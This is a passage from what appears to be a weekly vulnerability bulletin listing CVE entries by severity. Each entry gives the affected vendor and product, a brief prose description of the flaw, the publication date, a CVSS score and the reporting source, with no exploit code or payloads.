wordpress — wordpress The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 6.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-04 4.4 CVE-2023-6498
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5. This is due to missing or incorrect nonce validation on the ‘delete’ action of the wp-sms-subscribers page. This makes it possible for unauthenticated attackers to delete subscribers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-03 4.3 CVE-2023-6980
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on theprint_packinglist action in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to export orders which can contain sensitive information. 2024-01-03 4.3 CVE-2023-7068
security@wordfence.com
security@wordfence.com
zte — red_magic_8_pro Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro 2024-01-04 6.6 CVE-2023-41784
psirt@zte.com.cn
zte — zxcloud_irai There is a local privilege escalation vulnerability of ZTE’s ZXCLOUD iRAI.Attackers with regular user privileges can create a fake process, and to escalate local privileges. 2024-01-03 6.7 CVE-2023-41776
psirt@zte.com.cn
zte — zxcloud_irai There is an unsafe DLL loading vulnerability in ZTE ZXCLOUD iRAI. Due to the program  failed to adequately validate the user’s input, an attacker could exploit this vulnerability to escalate local privileges. 2024-01-03 6.4 CVE-2023-41780
psirt@zte.com.cn
zte — zxcloud_irai There is an illegal memory access vulnerability of ZTE’s ZXCLOUD iRAI product.When the vulnerability is exploited by an attacker with the common user permission, the physical machine will be crashed. 2024-01-03 4.4 CVE-2023-41779
psirt@zte.com.cn
zte — zxcloud_irai There is a command injection vulnerability of ZTE’s ZXCLOUD iRAI. Due to the program  failed to adequately validate the user’s input, an attacker could exploit this vulnerability to escalate local privileges. 2024-01-03 4.3 CVE-2023-41783
psirt@zte.com.cn

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
acumos — design_studio A vulnerability, which was classified as problematic, was found in Acumos Design Studio up to 2.0.7. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The name of the patch is 0df8a5e8722188744973168648e4c74c69ce67fd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249420. 2024-01-02 3.5 CVE-2018-25097
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
collective_idea, inc. — audited A race condition exists in Audited 4.0.0 to 5.3.3 that can result in an authenticated user to cause audit log entries to be attributed to another user. 2024-01-04 3.1 CVE-2024-22047
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Open Redirect vulnerability which could allow an attacker to redirect users to malicious sites, potentially leading to phishing attacks or other security threats. 2024-01-03 3.7 CVE-2023-50345
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an information disclosure vulnerability. Certain endpoints within the application disclose detailed file information. 2024-01-03 3.1 CVE-2023-50346
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an improper error handling vulnerability. The application returns detailed error messages that can provide an attacker with insight into the application, system, etc. 2024-01-03 3.1 CVE-2023-50348
psirt@hcl.com
huiran — host_reseller_system A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444. 2024-01-02 3.7 CVE-2024-0186
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
libssh — libssh A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter. 2024-01-03 3.9 CVE-2023-6004
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
mattermost — mattermost Mattermost fails to update the permissions of the current session for a user who was just demoted to guest, allowing freshly demoted guests to change group names. 2024-01-02 3.7 CVE-2023-50333
responsibledisclosure@mattermost.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability. 2024-01-02 3.1 CVE-2024-0188
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability. 2024-01-02 3.5 CVE-2024-0189
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503. 2024-01-02 3.5 CVE-2024-0190
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability. 2024-01-01 2.4 CVE-2024-0181
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability. 2024-01-01 2.4 CVE-2024-0183
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability. 2024-01-02 2.4 CVE-2024-0184
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
openharmony — openharmony in OpenHarmony v3.2.2 and prior versions allow a local attacker cause multimedia audio crash through modify a released pointer. 2024-01-02 3.3 CVE-2023-49142
scy@openharmony.io
packagekit — packagekit A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost. 2024-01-03 3.3 CVE-2024-0217
secalert@redhat.com
secalert@redhat.com
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45039
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45040
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45041
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45042
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45043
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45044
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 3.5 CVE-2023-47219
security@qnapsecurity.com.tw
samsung_mobile — samsung_email Implicit intent hijacking vulnerability in Samsung Email prior to version 6.1.90.16 allows attacker to get sensitive information. 2024-01-04 3.3 CVE-2024-20807
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Path traversal vulnerability in ZipCompressor of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. 2024-01-04 3.3 CVE-2024-20805
mobile.security@samsung.com
wordpress — wordpress A vulnerability was found in rt-prettyphoto Plugin up to 1.2 on WordPress and classified as problematic. Affected by this issue is the function royal_prettyphoto_plugin_links of the file rt-prettyphoto.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3 is able to address this issue. The patch is identified as 0d3d38cfa487481b66869e4212df1cefc281ecb7. It is recommended to upgrade the affected component. VDB-249422 is the identifier assigned to this vulnerability. 2024-01-02 3.5 CVE-2015-10128
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SolidWP Solid Security – Password, Two Factor Authentication, and Brute Force Protection. This issue affects Solid Security – Password, Two Factor Authentication, and Brute Force Protection through 8.1.4. 2023-12-29 3.7 CVE-2023-28786
audit@patchstack.com
zimbra — zm-ajax A vulnerability has been found in Zimbra zm-ajax up to 8.8.1 and classified as problematic. Affected by this vulnerability is the function XFormItem.prototype.setError of the file WebRoot/js/ajax/dwt/xforms/XFormItem.js. The manipulation of the argument message leads to cross site scripting. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 8.8.2 is able to address this issue. The identifier of the patch is 8d039d6efe80780adc40c6f670c06d21de272105. It is recommended to upgrade the affected component. The identifier VDB-249421 was assigned to this vulnerability. 2024-01-02 2.6 CVE-2017-20188
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zte — zxcloud_irai There is a DLL hijacking vulnerability in ZTE ZXCLOUD iRAI, an attacker could place a fake DLL file in a specific directory and successfully exploit this vulnerability to execute malicious code. 2024-01-05 3.9 CVE-2023-41782
psirt@zte.com.cn

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
abo.cms — abo.cms SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module. 2024-01-06 not yet calculated CVE-2023-46953
cve@mitre.org
aoyun_technology — pbootcms Aoyun Technology pbootcms V3.1.2 is vulnerable to Incorrect Access Control, allows remote attackers to gain sensitive information via session leakage allows a user to avoid logging into the backend management platform. 2024-01-04 not yet calculated CVE-2023-50082
cve@mitre.org
cve@mitre.org
apache — inlong Improper Control of Generation of Code (‘Code Injection’) vulnerability in Apache InLong. This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong’s 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9329 2024-01-03 not yet calculated CVE-2023-51784
security@apache.org
security@apache.org
apache — inlong Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.9.0, the attackers can make an arbitrary file read attack using mysql driver. Users are advised to upgrade to Apache InLong’s 1.10.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/9331 2024-01-03 not yet calculated CVE-2023-51785
security@apache.org
security@apache.org
apache — openoffice Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502. 2023-12-29 not yet calculated CVE-2023-47804
security@apache.org
security@apache.org
security@apache.org
apiida_ag — api_gateway_manager APIIDA API Gateway Manager for Broadcom Layer7 v2023.2 is vulnerable to Cross Site Scripting (XSS). 2024-01-03 not yet calculated CVE-2023-50092
cve@mitre.org
cve@mitre.org
apiida_ag — api_gateway_manager APIIDA API Gateway Manager for Broadcom Layer7 v2023.2.2 is vulnerable to Host Header Injection. 2024-01-03 not yet calculated CVE-2023-50093
cve@mitre.org
cve@mitre.org
autel_robotics — evo_nano Autel EVO NANO drone flight control firmware version 1.6.5 is vulnerable to denial of service (DoS). 2024-01-06 not yet calculated CVE-2023-50121
cve@mitre.org
automatic_systems — soc_fl9600_fastline Directory Traversal in Automatic-Systems SOC FL9600 FastLine lego_T04E00 allows a remote attacker to obtain sensitive information. 2024-01-03 not yet calculated CVE-2023-37607
cve@mitre.org
cve@mitre.org
cve@mitre.org
automatic_systems — soc_fl9600_fastline An issue in Automatic Systems SOC FL9600 FastLine v.lego_T04E00 allows a remote attacker to obtain sensitive information via the admin login credentials. 2024-01-03 not yet calculated CVE-2023-37608
cve@mitre.org
cve@mitre.org
cve@mitre.org
ava_teaching_video_application — ava_teaching_video_application Cross Site Scripting (XSS) vulnerability in AVA teaching video application service platform version 3.1, allows remote attackers to execute arbitrary code via a crafted script to ajax.aspx. 2024-01-06 not yet calculated CVE-2023-50609
cve@mitre.org
brave_software,_inc. — brave_browser Brave Browser before 1.59.40 does not properly restrict the schema for WebUI factory and redirect. This is related to browser/brave_content_browser_client.cc and browser/ui/webui/brave_web_ui_controller_factory.cc. 2023-12-30 not yet calculated CVE-2023-52263
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cesanta_software — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49549
cve@mitre.org
cesanta_software — mjs An Out of Bounds Write in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_stringify function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49552
cve@mitre.org
cesanta_software — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49553
cve@mitre.org
cetic-6lbr — cetic-6lbr examples/6lbr/apps/6lbr-webserver/httpd.c in CETIC-6LBR (aka 6lbr) 1.5.0 has a strcat stack-based buffer overflow via a request for a long URL over a 6LoWPAN network. 2023-12-31 not yet calculated CVE-2021-46901
cve@mitre.org
cve@mitre.org
cherry — cherry handle_request in http.c in cherry through 4b877df has an sscanf stack-based buffer overflow via a long URI, leading to remote code execution. 2024-01-05 not yet calculated CVE-2024-22086
cve@mitre.org
class.upload.php — class.upload.php As a simple library, class.upload.php does not perform an in-depth check on uploaded files, allowing a stored XSS vulnerability when the default configuration is used. Developers must be aware of that fact and use extension whitelisting accompanied by forcing the server to always provide content-type based on the file extension. The README has been updated to include these guidelines. 2024-01-04 not yet calculated CVE-2023-6551
cvd@cert.pl
cvd@cert.pl
cmark-gfm — cmark-gfm CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns. 2024-01-04 not yet calculated CVE-2024-22051
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
dzzoffice — dzzoffice SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module. 2024-01-06 not yet calculated CVE-2023-39853
cve@mitre.org
ehttp — ehttp ehttp 1.0.6 before 17405b9 has an epoll_socket.cpp read_func use-after-free. An attacker can make many connections over a short time to trigger this. 2023-12-31 not yet calculated CVE-2023-52266
cve@mitre.org
cve@mitre.org
ehttp — ehttp ehttp 1.0.6 before 17405b9 has a simple_log.cpp _log out-of-bounds-read during error logging for long strings. 2023-12-31 not yet calculated CVE-2023-52267
cve@mitre.org
cve@mitre.org
encoded_id-rails — encoded_id-rails encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial-of-service condition by sending an HTTP request with an extremely long “id” parameter. 2024-01-04 not yet calculated CVE-2024-0241
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
firefly-iii — firefly-iii Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection. 2024-01-05 not yet calculated CVE-2024-22075
cve@mitre.org
fit2cloud — cloud_explorer_lite Insecure Permissions vulnerability in fit2cloud Cloud Explorer Lite version 1.4.1, allow local attackers to escalate privileges and obtain sensitive information via the cloud accounts parameter. 2024-01-06 not yet calculated CVE-2023-50612
cve@mitre.org
floorsight_software_llc — customer_portal_q3_2023 An indirect Object Reference (IDOR) in the Order and Invoice pages in Floorsight Customer Portal Q3 2023 allows an unauthenticated remote attacker to view sensitive customer information. 2024-01-02 not yet calculated CVE-2023-45893
cve@mitre.org
floorsight_software_llc — insights_q3_2023 An issue discovered in the Order and Invoice pages in Floorsight Insights Q3 2023 allows an unauthenticated remote attacker to view sensitive customer information. 2024-01-02 not yet calculated CVE-2023-45892
cve@mitre.org
flycms — flycms FlyCms through abbaa5a allows XSS via the permission management feature. 2024-01-01 not yet calculated CVE-2024-21732
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.32 for Intel SGX. Lack of pointer-alignment validation logic in entry functions allows a local attacker to access unauthorized information. This relates to the enclave_ecall function and system call layer. 2023-12-30 not yet calculated CVE-2023-38021
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user. 2023-12-30 not yet calculated CVE-2023-38022
cve@mitre.org
cve@mitre.org
gila_cms — gila_cms SQL Injection vulnerability discovered in Gila CMS 1.15.4 and earlier allows a remote attacker to execute arbitrary web scripts via the Area parameter under the Administration>Widget tab after the login portal. 2024-01-02 not yet calculated CVE-2020-26623
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
gila_cms — gila_cms A SQL injection vulnerability was discovered in Gila CMS 1.15.4 and earlier which allows a remote attacker to execute arbitrary web scripts via the ID parameter after the login portal. 2024-01-02 not yet calculated CVE-2020-26624
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
gila_cms — gila_cms A SQL injection vulnerability was discovered in Gila CMS 1.15.4 and earlier which allows a remote attacker to execute arbitrary web scripts via the ‘user_id’ parameter after the login portal. 2024-01-02 not yet calculated CVE-2020-26625
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
gl.inet — multiple_products An issue was discovered on GL.iNet devices through 4.5.0. Attackers can invoke the add_user interface in the system module to gain root privileges. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7. 2024-01-03 not yet calculated CVE-2023-50921
cve@mitre.org
gl.inet — multiple_products An issue was discovered on GL.iNet devices through 4.5.0. Attackers who are able to steal the AdminToken cookie can execute arbitrary code by uploading a crontab-formatted file to a specific directory and waiting for its execution. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7. 2024-01-03 not yet calculated CVE-2023-50922
cve@mitre.org
google — chrome Use after free in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0222
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Heap buffer overflow in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0223
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in WebAudio in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0224
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0225
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
govuk_tech_docs — govuk_tech_docs govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user’s browser if a malicious search result is displayed on the search page. 2024-01-04 not yet calculated CVE-2024-22048
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
gpac — gpac An issue discovered in GPAC 2.3-DEV-rev605-gfc9e29089-master in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 allows attackers to crash the application. 2024-01-03 not yet calculated CVE-2023-46929
cve@mitre.org
cve@mitre.org
httparty — httparty httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written. 2024-01-04 not yet calculated CVE-2024-22049
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
idurar-erp-crm — idurar-erp-crm IDURAR (aka idurar-erp-crm) through 2.0.1 allows stored XSS via a PATCH request with a crafted JSON email template in the /api/email/update data. 2023-12-30 not yet calculated CVE-2023-52265
cve@mitre.org
cve@mitre.org
ifair — ifair Directory Traversal vulnerability in fuwushe.org iFair versions 23.8_ad0 and before allows an attacker to obtain sensitive information via a crafted script. 2024-01-03 not yet calculated CVE-2023-47473
cve@mitre.org
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+27ef heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13878
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+214f heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13879
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+1cbf heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13880
cve@mitre.org
iodine — iodine Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs. 2024-01-04 not yet calculated CVE-2024-22050
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
jeecg — jeecg Deserialization of Untrusted Data in jeecgFormDemoController in JEECG 4.0 and earlier allows attackers to run arbitrary code via crafted POST request. 2024-01-03 not yet calculated CVE-2023-49442
cve@mitre.org
jizhicms — jizhicms Jizhicms v2.5 was discovered to contain an arbitrary file download vulnerability via the component /admin/c/PluginsController.php. 2024-01-04 not yet calculated CVE-2023-51154
cve@mitre.org
jupyter_notebook_viewer — nbviewer_app nbviewer-app (aka Jupyter Notebook Viewer) before 0.1.6 has the get-task-allow entitlement for release builds. 2024-01-05 not yet calculated CVE-2023-51277
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
kantega_software_corp. — kantega_sso The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.) 2023-12-29 not yet calculated CVE-2023-52240
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
layui — layui layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter. 2023-12-30 not yet calculated CVE-2023-50550
cve@mitre.org
linux — kernel Closing of an event channel in the Linux kernel can result in a deadlock. This happens when the close is being performed in parallel to an unrelated Xen console action and the handling of a Xen console interrupt in an unprivileged guest. The closing of an event channel is e.g. triggered by removal of a paravirtual device on the other side. As this action will cause console messages to be issued on the other side quite often, the chance of triggering the deadlock is not neglectable. Note that 32-bit Arm-guests are not affected, as the 32-bit Linux kernel on Arm doesn’t use queued-RW-locks, which are required to trigger the issue (on Arm32 a waiting writer doesn’t block further readers to get the lock). 2024-01-05 not yet calculated CVE-2023-34324
security@xen.org
little-backup-box — little-backup-box outdoorbits little-backup-box (aka Little Backup Box) before f39f91c allows remote attackers to execute arbitrary code because the PHP extract function is used for untrusted input. 2023-12-30 not yet calculated CVE-2023-52262
cve@mitre.org
cve@mitre.org
lotos_webserver — lotos_webserver Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled. 2024-01-05 not yet calculated CVE-2024-22088
cve@mitre.org
ly_corp. — line_app An issue in Tamaki_hamanoki Line v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2024-01-03 not yet calculated CVE-2023-45559
cve@mitre.org
cve@mitre.org
ly_corp. — line_app An issue in A-WORLD OIRASE BEER_waiting Line v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2024-01-02 not yet calculated CVE-2023-45561
cve@mitre.org
cve@mitre.org
cve@mitre.org
mingsoft_mcms — mingsoft_mcms Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do. 2023-12-30 not yet calculated CVE-2023-50578
cve@mitre.org
